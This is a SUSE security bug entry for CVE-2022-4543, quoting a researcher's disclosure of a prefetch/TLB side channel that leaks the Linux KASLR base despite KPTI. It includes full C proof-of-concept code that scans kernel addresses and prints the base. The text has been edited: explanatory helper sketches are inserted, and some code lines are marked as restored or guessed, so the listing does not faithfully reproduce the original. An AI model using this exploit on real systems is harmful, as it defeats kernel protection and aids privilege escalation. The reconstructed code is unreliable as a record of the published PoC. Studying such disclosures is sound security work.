Bug 1206463 - (CVE-2022-4543) VUL-0: CVE-2022-4543: kernel: KASLR offset exposure even with KPTI
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Priority: P3 - Medium, Severity: Normal
Assigned To: Michal Hocko
Security Team bot
Reported: 2022-12-16 07:54 UTC by Thomas Leroy
Modified: 2023-01-31 05:23 UTC (History)

Comment 7 Robert Frohl 2022-12-19 08:50:58 UTC

Subject: CVE-2022-4543: KASLR Leakage Achievable even with KPTI through Prefetch Side-Channel

I've discovered that KPTI has implementation issues that allow any local attacker to leak the KASLR base easily, quickly, and reliably on Intel systems, using a prefetch side channel based on TLB timing.

I have developed code samples that reliably leak the KASLR base with this technique in under a second under normal system conditions with KPTI enabled, on both host and guest OSes (under KVM), on the following CPUs: Intel i5-8265U (Arch 6.0.12-hardened1-1-hardened), Intel i7-8750H, Intel i7-9750H (Ubuntu 5.15.0-56-generic host, custom 5.18.3 on guest), Intel i7-9700F (6.0.12-1-MANJARO), and Intel Xeon(R) CPU E5-2640 (5.10.0-19-amd64). Based on my own preliminary testing, I do not believe this affects AMD CPUs.

It is already known that systems without KPTI are vulnerable to prefetch side channels for KASLR leakage. However, there seems to have been an assumption that KPTI/KAISER would provide enough isolation to prevent CPU side-channel attacks against KASLR.

This turns out not to be the case because of what KPTI leaves in the userspace mappings. The code under entry_SYSCALL_64 is still mapped into userspace to handle syscalls, and its virtual address is at a constant offset from the kernel base. An attacker can repeatedly make syscalls to force that page into the TLB and then use the prefetch side channel to find the address of entry_SYSCALL_64, which breaks KASLR. This works because prefetch executes faster when a virtual address is in the TLB, avoiding a page table walk, and because the TLB entry for that page has the global bit set and so is not flushed on a CR3 write.
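
The address arithmetic behind that paragraph can be sketched as follows. This is only an illustration, not part of the original report: the helper names candidate_count and kaslr_base are hypothetical, the range bounds and step are the values used in the demonstration code in this report, and the leaked address in the usage note is made up.

```c
#include <assert.h>
#include <stdint.h>

/* Values taken from the demonstration code in this report. */
#define KERNEL_LOWER_BOUND 0xffffffff80000000ull
#define KERNEL_UPPER_BOUND 0xffffffffc0000000ull
#define STEP               0x100000ull

/* Hypothetical helper: number of candidate addresses a scan of the
 * whole range has to probe at the given step. */
static uint64_t candidate_count(void) {
    return (KERNEL_UPPER_BOUND - KERNEL_LOWER_BOUND) / STEP;
}

/* Hypothetical helper: because entry_SYSCALL_64 sits at a constant
 * offset from the kernel base, one subtraction recovers the base
 * from the leaked entry address. */
static uint64_t kaslr_base(uint64_t entry_addr, uint64_t entry_offset) {
    assert(entry_addr >= entry_offset);
    return entry_addr - entry_offset;
}
```

For example, with a made-up leaked entry address of 0xffffffff9e400000 and an offset of 0x400000, kaslr_base returns 0xffffffff9e000000. The scan space is small, which is consistent with the attack completing quickly.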

Based on early discussions with security@...nel.org and linux-distros@...openwall.org, this behavior is unintended and might even be a regression in KPTI's implementation. A fix for this is currently not available.

More information can be found at https://www.willsroot.io/2022/12/entrybleed.html. The following primitive demonstration code leaks the KASLR base on systems with KPTI with a high degree of reliability. Compile it with gcc using -static and -no-pie; entry_SYSCALL_64_offset must be adjusted for the target kernel by setting it to the distance between entry_SYSCALL_64 and startup_64:

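#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <sys/syscall.h>

#define KERNEL_LOWER_BOUND 0xffffffff80000000ull
#define KERNEL_UPPER_BOUND 0xffffffffc0000000ull
/* Distance between entry_SYSCALL_64 and startup_64; adjust per kernel. */
#define entry_SYSCALL_64_offset 0x400000ull

/* Returns the cycle count of two prefetches of addr (lower on a TLB hit). */
uint64_t sidechannel(uint64_t addr) {
  uint64_t a, b, c, d;
  /* The rdtscp and fence lines were missing from this copy. They are
     restored here because the rax/rdx moves only make sense as
     timestamp-counter reads. */
  asm volatile (".intel_syntax noprefix;"
    "mfence;"
    "rdtscp;"
    "mov %0, rax;"
    "mov %1, rdx;"
    "xor rax, rax;"
    "lfence;"
    "prefetchnta qword ptr [%4];"
    "prefetcht2 qword ptr [%4];"
    "xor rax, rax;"
    "lfence;"
    "rdtscp;"
    "mov %2, rax;"
    "mov %3, rdx;"
    "mfence;"
    ".att_syntax;"
    /* Early-clobber outputs so none of them shares a register with addr. */
    : "=&r" (a), "=&r" (b), "=&r" (c), "=&r" (d)
    : "r" (addr)
    : "rax", "rbx", "rcx", "rdx");
  a = (b << 32) | a;
  c = (d << 32) | c;
  return c - a;
}

#define STEP 0x100000ull
/* SCAN_START and ARR_SIZE were missing; restored by symmetry with SCAN_END. */
#define SCAN_START (KERNEL_LOWER_BOUND + entry_SYSCALL_64_offset)
#define SCAN_END (KERNEL_UPPER_BOUND + entry_SYSCALL_64_offset)
#define ARR_SIZE ((SCAN_END - SCAN_START) / STEP)

/* Assumption: the warm-up count was missing from this copy; 5 is a guess. */
#define DUMMY_ITERATIONS 5
#define ITERATIONS 100

uint64_t leak_syscall_entry(void)
{
    uint64_t data[ARR_SIZE] = {0};
    uint64_t min = ~0ull, addr = ~0ull;

    for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++)
    {
        for (uint64_t idx = 0; idx < ARR_SIZE; idx++)
        {
            uint64_t test = SCAN_START + idx * STEP;
            /* Assumption: this call was missing from this copy. Any cheap
               syscall pulls the entry page into the TLB before timing. */
            syscall(SYS_getgid);
            uint64_t time = sidechannel(test);
            /* Discard the warm-up rounds. */
            if (i >= DUMMY_ITERATIONS)
                data[idx] += time;
        }
    }

    /* The candidate with the lowest average timing is the mapped page. */
    for (uint64_t i = 0; i < ARR_SIZE; i++)
    {
        data[i] /= ITERATIONS;
        if (data[i] < min)
        {
            min = data[i];
            addr = SCAN_START + i * STEP;
        }
        printf("%llx %llu\n", (unsigned long long)(SCAN_START + i * STEP),
               (unsigned long long)data[i]);
    }

    return addr;
}

int main()
{
    printf("KASLR base %llx\n",
           (unsigned long long)(leak_syscall_entry() - entry_SYSCALL_64_offset));
    return 0;
}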
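
The selection step of the listing (discard warm-up rounds, average the rest, take the fastest candidate) can be looked at in isolation on recorded numbers, without any timing hardware. The sketch below is an illustration under assumptions, not part of the original report: the function name fastest_candidate and the row-major sample layout are hypothetical, and any data fed to it would be synthetic.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical helper: index of the candidate with the lowest mean timing.
 * samples holds rounds * n values in row-major order (one row per round);
 * the first `warmup` rounds are ignored. Sums are compared instead of
 * means because every candidate has the same number of counted rounds.
 */
static size_t fastest_candidate(const uint64_t *samples, size_t rounds,
                                size_t n, size_t warmup) {
    assert(n > 0 && rounds > warmup);
    size_t best = 0;
    uint64_t best_sum = UINT64_MAX;
    for (size_t idx = 0; idx < n; idx++) {
        uint64_t sum = 0;
        for (size_t r = warmup; r < rounds; r++)
            sum += samples[r * n + idx];
        if (sum < best_sum) {
            best_sum = sum;
            best = idx;
        }
    }
    return best;
}
```

The returned index maps back to an address as SCAN_START + index * STEP. Skipping the warm-up rounds matters because the first measurements can be distorted by cold caches, so a single early outlier could otherwise pick the wrong candidate.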